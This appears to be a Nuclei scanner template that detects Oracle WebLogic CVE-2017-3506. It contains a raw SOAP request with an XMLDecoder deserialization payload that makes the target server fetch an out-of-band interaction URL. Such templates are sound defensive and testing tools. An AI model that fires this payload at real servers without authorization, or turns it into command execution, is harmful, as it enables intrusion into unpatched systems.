id: CVE-2017-3506

info:
  name: Oracle Weblogic Remote OS Command Execution
  author: pdteam
  description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
  severity: high
  tags: cve,cve2017,weblogic,oracle,rce,oast
  reference:
    - https://hackerone.com/reports/810778
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 7.40
    cve-id: CVE-2017-3506

requests:
  - raw:
      - |
        POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java version="1.8" class="java.beans.XMLDecoder">
                <void id="url" class="java.net.URL">
                  <string>http://{{interactsh-url}}</string>
                </void>
                <void idref="url">
                  <void id="stream" method ="openStream"/>
                </void>
              </java>
            </work:WorkContext>
            </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"